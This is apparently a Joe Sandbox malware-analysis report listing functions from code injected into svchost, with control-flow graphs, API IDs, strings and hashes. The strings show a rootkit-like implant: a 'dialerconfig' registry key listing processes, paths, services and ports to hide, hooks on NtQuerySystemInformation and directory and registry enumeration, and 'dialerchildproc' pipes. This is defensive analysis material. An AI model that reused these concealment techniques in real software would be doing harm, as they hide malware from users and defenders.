                                                control_flow_graph 207 26e027c2cdc-26e027c2d55 call 26e027decc0 210 26e027c2d5b-26e027c2d61 207->210 211 26e027c3090-26e027c30b3 207->211 210->211 212 26e027c2d67-26e027c2d6a 210->212 212->211 213 26e027c2d70-26e027c2d73 212->213 213->211 214 26e027c2d79-26e027c2d89 GetModuleHandleA 213->214 215 26e027c2d8b-26e027c2d9b GetProcAddress 214->215 216 26e027c2d9d 214->216 217 26e027c2da0-26e027c2dbe 215->217 216->217 217->211 219 26e027c2dc4-26e027c2de3 StrCmpNIW 217->219 219->211 220 26e027c2de9-26e027c2ded 219->220 220->211 221 26e027c2df3-26e027c2dfd 220->221 221->211 222 26e027c2e03-26e027c2e0a 221->222 222->211 223 26e027c2e10-26e027c2e23 222->223 224 26e027c2e33 223->224 225 26e027c2e25-26e027c2e31 223->225 226 26e027c2e36-26e027c2e3a 224->226 225->226 227 26e027c2e4a 226->227 228 26e027c2e3c-26e027c2e48 226->228 229 26e027c2e4d-26e027c2e57 227->229 228->229 230 26e027c2f4d-26e027c2f51 229->230 231 26e027c2e5d-26e027c2e60 229->231 234 26e027c2f57-26e027c2f5a 230->234 235 26e027c3082-26e027c308a 230->235 232 26e027c2e72-26e027c2e7c 231->232 233 26e027c2e62-26e027c2e6f call 26e027c1a14 231->233 237 26e027c2e7e-26e027c2e8b 232->237 238 26e027c2eb0-26e027c2eba 232->238 233->232 239 26e027c2f6b-26e027c2f75 234->239 240 26e027c2f5c-26e027c2f68 call 26e027c1a14 234->240 235->211 235->223 237->238 244 26e027c2e8d-26e027c2e9a 237->244 245 26e027c2eea-26e027c2eed 238->245 246 26e027c2ebc-26e027c2ec9 238->246 241 26e027c2f77-26e027c2f84 239->241 242 26e027c2fa5-26e027c2fa8 239->242 240->239 241->242 248 26e027c2f86-26e027c2f93 241->248 249 26e027c2faa-26e027c2fb3 call 26e027c1d28 242->249 250 26e027c2fb5-26e027c2fc2 lstrlenW 242->250 251 26e027c2e9d-26e027c2ea3 244->251 253 26e027c2efb-26e027c2f08 lstrlenW 245->253 254 26e027c2eef-26e027c2ef9 call 26e027c1d28 245->254 246->245 252 26e027c2ecb-26e027c2ed8 246->252 257 26e027c2f96-26e027c2f9c 248->257 249->250 267 26e027c2ffa-26e027c3005 249->267 263 26e027c2fc4-26e027c2fce 250->263 264 26e027c2fe5-26e027c2fef call 26e027c3930 250->264 261 26e027c2ea9-26e027c2eae 251->261 262 26e027c2f43-26e027c2f48 251->262 265 26e027c2edb-26e027c2ee1 252->265 258 26e027c2f0a-26e027c2f14 253->258 259 26e027c2f2b-26e027c2f3d call 26e027c3930 253->259 254->253 254->262 257->267 268 26e027c2f9e-26e027c2fa3 257->268 258->259 269 26e027c2f16-26e027c2f29 call 26e027c1554 258->269 259->262 272 26e027c2ff2-26e027c2ff4 259->272 261->238 261->251 262->272 263->264 273 26e027c2fd0-26e027c2fe3 call 26e027c1554 263->273 264->272 265->262 274 26e027c2ee3-26e027c2ee8 265->274 277 26e027c307c-26e027c3080 267->277 278 26e027c3007-26e027c300b 267->278 268->242 268->257 269->259 269->262 272->235 272->267 273->264 273->267 274->245 274->265 277->235 282 26e027c300d-26e027c3011 278->282 283 26e027c3013-26e027c302d call 26e027c86a0 278->283 282->283 286 26e027c3030-26e027c3033 282->286 283->286 289 26e027c3056-26e027c3059 286->289 290 26e027c3035-26e027c3053 call 26e027c86a0 286->290 289->277 292 26e027c305b-26e027c3079 call 26e027c86a0 289->292 290->289 292->277
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                • API String ID: 2119608203-3850299575
                                                • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction ID: ab0ab5812e97bc83c4bf3823a8666a6cfbeb3f6612aca29d223c33e78b1b3bb7
                                                • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                • Instruction Fuzzy Hash: 3FB1EF7A210A508AEF658F35C4887B963E5F744B94F6A501AEE49737D5DFB6CC80C340

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 3140674995-0
                                                • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction ID: 7145d7ffe0b120577a17de370ec565026b85cd869d514bfc2c53cbc019b93ac4
                                                • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                • Instruction Fuzzy Hash: C7316F76204B808AEB649F60E8847EE73B4F784744F49442ADA8E57BD8EF79C548CB10
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                • String ID:
                                                • API String ID: 1239891234-0
                                                • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction ID: d0258cd8ee7dd3dd1ded64580f543459be1bb1188360d13ab1e02aa565c7f35b
                                                • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                                • Instruction Fuzzy Hash: 91315F3A214F808ADB60CF35E8847AE73E4F788758F59011AEA9D57B94DF79C545CB00
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite$ConsoleOutput
                                                • String ID:
                                                • API String ID: 1443284424-0
                                                • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction ID: c900164d5df396f03e74ad42f1f1b6641d3b052e327a8ce0ff7da57f221de759
                                                • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                                • Instruction Fuzzy Hash: 85E1DE36A08A809FEB00CF64D4882ED7BF1F345788F59511ADE8A67BD9DAB6C516C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 667fb6dfba2cfd8cd924a51e86ca10e603a25f9860a749a460c8690d6d777377
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: E6715E3A710A408AEF109F31E8D86A923F5F784B88F8A5125DE8D777A9DF76C444C740

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                • String ID: d
                                                • API String ID: 2005889112-2564639436
                                                • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction ID: f6fc0338f33ff453b23c0b1b2b7a4f517ed195f7a8d15abd7ae33221e504b31a
                                                • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                                • Instruction Fuzzy Hash: 8E51A376204B45DBEB14CF62E58836A73F1F788B80F498128DB8917B94DF7AC555CB40

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: f21e957f07e3b5d0a9e822f09b4748c8075eff71f8e8683ae0445e7519565883
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 9631C67C101A0AAAEF05EF65E8C96F423B0B784744F9F59179849362E2DEFA8649C340

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 12a132d4fdf2fec3cc04cc285bc29dc8d679e7a300a296416f393a2a8630c39b
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: AA214139614B4087FB108B25F48876973F1F389BA4F994215DA9912BE8DF7DC549CF01

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 8bdd6c1410eae6d65bc3a223debe646f93794550aa80f16201fd7abf952780ef
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 08418077614B80DBEB60CF61E4883AAB7E1F388B84F558129DB8917B94DF79C164CB00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 427 26e027c75f0-26e027c75f6 428 26e027c75f8-26e027c75fb 427->428 429 26e027c7631-26e027c763b 427->429 430 26e027c75fd-26e027c7600 428->430 431 26e027c7625-26e027c7664 call 26e027c7ca0 428->431 432 26e027c7758-26e027c776d 429->432 433 26e027c7618 __scrt_dllmain_crt_thread_attach 430->433 434 26e027c7602-26e027c7605 430->434 447 26e027c766a-26e027c767f call 26e027c7b34 431->447 448 26e027c7732 431->448 435 26e027c777c-26e027c7796 call 26e027c7b34 432->435 436 26e027c776f 432->436 442 26e027c761d-26e027c7624 433->442 438 26e027c7607-26e027c7610 434->438 439 26e027c7611-26e027c7616 call 26e027c7be4 434->439 450 26e027c7798-26e027c77cd call 26e027c7c5c call 26e027c7afc call 26e027c7ff8 call 26e027c7e10 call 26e027c7e34 call 26e027c7c8c 435->450 451 26e027c77cf-26e027c7800 call 26e027c7e70 435->451 440 26e027c7771-26e027c777b 436->440 439->442 459 26e027c774a-26e027c7757 call 26e027c7e70 447->459 460 26e027c7685-26e027c7696 call 26e027c7ba4 447->460 452 26e027c7734-26e027c7749 448->452 450->440 461 26e027c7802-26e027c7808 451->461 462 26e027c7811-26e027c7817 451->462 459->432 479 26e027c76e7-26e027c76f1 call 26e027c7e10 460->479 480 26e027c7698-26e027c76bc call 26e027c7fbc call 26e027c7aec call 26e027c7b18 call 26e027c9cdc 460->480 461->462 466 26e027c780a-26e027c780c 461->466 467 26e027c7819-26e027c7823 462->467 468 26e027c785e-26e027c7874 call 26e027c3458 462->468 473 26e027c78ff-26e027c790c 466->473 474 26e027c7825-26e027c782d 467->474 475 26e027c782f-26e027c783d call 26e027d3358 467->475 488 26e027c78ac-26e027c78ae 468->488 489 26e027c7876-26e027c7878 468->489 482 26e027c7843-26e027c7858 call 26e027c75f0 474->482 475->482 492 26e027c78f5-26e027c78fd 475->492 479->448 500 26e027c76f3-26e027c76ff call 26e027c7e60 479->500 480->479 530 26e027c76be-26e027c76c5 __scrt_dllmain_after_initialize_c 480->530 482->468 482->492 490 26e027c78b5-26e027c78ca call 26e027c75f0 488->490 491 26e027c78b0-26e027c78b3 488->491 489->488 497 26e027c787a-26e027c789c call 26e027c3458 call 26e027c7758 489->497 490->492 509 26e027c78cc-26e027c78d6 490->509 491->490 491->492 492->473 497->488 524 26e027c789e-26e027c78a6 call 26e027d3358 497->524 517 26e027c7725-26e027c7730 500->517 518 26e027c7701-26e027c770b call 26e027c7d78 500->518 514 26e027c78d8-26e027c78df 509->514 515 26e027c78e1-26e027c78f1 call 26e027d3358 509->515 514->492 515->492 517->452 518->517 529 26e027c770d-26e027c771b 518->529 524->488 529->517 530->479 531 26e027c76c7-26e027c76e4 call 26e027c9c78 530->531 531->479
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 243f975d5dbef8bdb6beb42359683e4f2cacf6e0117101ae6fae00b916c193ff
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 1F81C5397046458FFE58AB3998C9379A2E8A785780F2E406D9A44777D6DFFBC8418F00

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 320 26e027969f0-26e027969f6 321 26e027969f8-26e027969fb 320->321 322 26e02796a31-26e02796a3b 320->322 324 26e027969fd-26e02796a00 321->324 325 26e02796a25-26e02796a64 call 26e027970a0 321->325 323 26e02796b58-26e02796b6d 322->323 329 26e02796b7c-26e02796b96 call 26e02796f34 323->329 330 26e02796b6f 323->330 327 26e02796a18 __scrt_dllmain_crt_thread_attach 324->327 328 26e02796a02-26e02796a05 324->328 340 26e02796a6a-26e02796a7f call 26e02796f34 325->340 341 26e02796b32 325->341 336 26e02796a1d-26e02796a24 327->336 332 26e02796a07-26e02796a10 328->332 333 26e02796a11-26e02796a16 call 26e02796fe4 328->333 343 26e02796b98-26e02796bcd call 26e0279705c call 26e02796efc call 26e027973f8 call 26e02797210 call 26e02797234 call 26e0279708c 329->343 344 26e02796bcf-26e02796c00 call 26e02797270 329->344 334 26e02796b71-26e02796b7b 330->334 333->336 353 26e02796b4a-26e02796b57 call 26e02797270 340->353 354 26e02796a85-26e02796a96 call 26e02796fa4 340->354 346 26e02796b34-26e02796b49 341->346 343->334 355 26e02796c11-26e02796c17 344->355 356 26e02796c02-26e02796c08 344->356 353->323 373 26e02796ae7-26e02796af1 call 26e02797210 354->373 374 26e02796a98-26e02796abc call 26e027973bc call 26e02796eec call 26e02796f18 call 26e027990dc 354->374 358 26e02796c19-26e02796c23 355->358 359 26e02796c5e-26e02796c74 call 26e02792858 355->359 356->355 357 26e02796c0a-26e02796c0c 356->357 363 26e02796cff-26e02796d0c 357->363 364 26e02796c2f-26e02796c3d call 26e027a2758 358->364 365 26e02796c25-26e02796c2d 358->365 381 26e02796c76-26e02796c78 359->381 382 26e02796cac-26e02796cae 359->382 370 26e02796c43-26e02796c58 call 26e027969f0 364->370 385 26e02796cf5-26e02796cfd 364->385 365->370 370->359 370->385 373->341 394 26e02796af3-26e02796aff call 26e02797260 373->394 374->373 423 26e02796abe-26e02796ac5 __scrt_dllmain_after_initialize_c 374->423 381->382 390 26e02796c7a-26e02796c9c call 26e02792858 call 26e02796b58 381->390 383 26e02796cb0-26e02796cb3 382->383 384 26e02796cb5-26e02796cca call 26e027969f0 382->384 383->384 383->385 384->385 404 26e02796ccc-26e02796cd6 384->404 385->363 390->382 415 26e02796c9e-26e02796ca6 call 26e027a2758 390->415 412 26e02796b01-26e02796b0b call 26e02797178 394->412 413 26e02796b25-26e02796b30 394->413 409 26e02796cd8-26e02796cdf 404->409 410 26e02796ce1-26e02796cf1 call 26e027a2758 404->410 409->385 410->385 412->413 422 26e02796b0d-26e02796b1b 412->422 413->346 415->382 422->413 423->373 424 26e02796ac7-26e02796ae4 call 26e02799078 423->424 424->373
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 5a6b3f6c9317d8ed1f062b7480a15016e8184826821fd883873ab58d4ef18528
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: 008113796143418EFE54AB2598CD37962E9E786780F5F4229BE08737D6DBFBC8818300

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 534 26e027c9804-26e027c9842 535 26e027c9848-26e027c984b 534->535 536 26e027c9933 534->536 537 26e027c9935-26e027c9951 535->537 538 26e027c9851 535->538 536->537 539 26e027c9854 538->539 540 26e027c985a-26e027c9869 539->540 541 26e027c992b 539->541 542 26e027c986b-26e027c986e 540->542 543 26e027c9876-26e027c9895 LoadLibraryExW 540->543 541->536 544 26e027c990d-26e027c991c GetProcAddress 542->544 545 26e027c9874 542->545 546 26e027c98ed-26e027c9902 543->546 547 26e027c9897-26e027c98a0 call 26e027d3080 543->547 544->541 548 26e027c991e-26e027c9929 544->548 549 26e027c98e1-26e027c98e8 545->549 546->544 551 26e027c9904-26e027c9907 FreeLibrary 546->551 553 26e027c98a2-26e027c98b7 call 26e027cad28 547->553 554 26e027c98cf-26e027c98d9 547->554 548->537 549->539 551->544 553->554 557 26e027c98b9-26e027c98cd LoadLibraryExW 553->557 554->549 557->546 557->554
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: 9a5f57febfe32590c4d523f0353beb136a2f5bcc58ed9dbadc77c8b2c739fb19
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 4B31E539202B40D9FF559B22A4887B923E4BB48BA0F6F0528DE6D273C0DFB9C0448700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: c4fefdd5599984354cf0ff892720091c621894ad19e6b24c4482f2e3c28c786c
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: A7118F36714B408BEB508B56E89832976F0F788FE4F494224EA9D977D4DFBAC9048B40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: 366098d83052950f8ad60320867be25376ee9be932b08e9a9a28d3acc8a64091
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: EDD1AC7A208B8886DA70DB1AE4D436A77F0F3C8B84F554216EACD57BA5DF7AC541CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: fecb9f5eaf39740fc6ac11f0cd628fcdc31fde96270784dd0c1e22eaacfba607
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 3831B639701F518FEF11DF26A88867963E0FB44B84F1E80649E8827B94EF7AC4A18700
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: de1d74e92d318f10935076f78a65f087db6724f0bc4b6784d9e9dbc8ca0c77b5
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: B8016D35700A419BEB10DB22A89C36963E1F788FC0F9D4075CE8D53794DE7EC9858740
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 20c682b8bc8ce5698e21820d2a1f0a7e4cf0476fc68bd491d8929d24ba400b42
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 6B115B78602B418BFF219B21E89D72662F0BB48B81F194469CD8D2B7D4EF7EC0088B10
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 1f8fc5c10ebc940c0068b293068eddbcaff2a0151ba2ccd6a2e89f42b5f1c810
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 0C518F3A211610CFEF94CB25E48CB7937E5F344B98F6A81289B46677C8EBB6C841C700
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: d1cd6b8f10e07fdb81256b22d94097f273fe4a80ede9a7d9f01fa456c5eccfce
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: DE317039210650DBEB54DF21E88D73937E5F744B88F2A8118AF56177C5DBBAC941C704
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: e0d8711b5aae5929797bc1aef1c48c8cdfc6d6c786b88f0553d48020b897baba
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 37F044763046819BEF208F25F5D836967B1F744B88F898075CA8D56595DEAEC648CF00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
